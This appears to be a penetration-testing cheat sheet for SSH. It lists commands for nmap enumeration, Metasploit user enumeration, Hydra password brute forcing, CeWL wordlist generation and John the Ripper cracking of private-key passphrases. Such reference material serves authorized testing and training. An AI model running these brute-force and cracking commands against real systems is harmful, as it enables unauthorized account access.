SSH (Secure Shell) Pentesting
CryptographyNetworkPrivilege Escalation
SSH is a cryptographic network protocol for operating network services securely over an unsecured network. A default port is 22.
Enumeration
nmap --script ssh-brute -p 22 <target-ip>nmap --script ssh-auth-methods --script-args="ssh.user=username" -p 22 <target-ip>
nmap --script ssh-* -p 22 <target-ip>
# User enumeration
msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers
Copied!
Brute Force Credentials
# -t: taskshydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4
# Specific portshydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4
Copied!
If the target host opens port 80 or 443, you can generate wordlist from the contents of the website then use Hydra.
cewl http://<target-ip> > wordlist.txt
Copied!
Crack SSH Private Key
First of all, you need to format the private key to make John to recognize it.ssh2john private_key.txt > hash.txt
# or
python2 /usr/share/john/ssh2john.py private_key.txt > hash.txt
Copied!
Crack the password of the private key using the formatted text.
john --wordlist=wordlist.txt hash.txt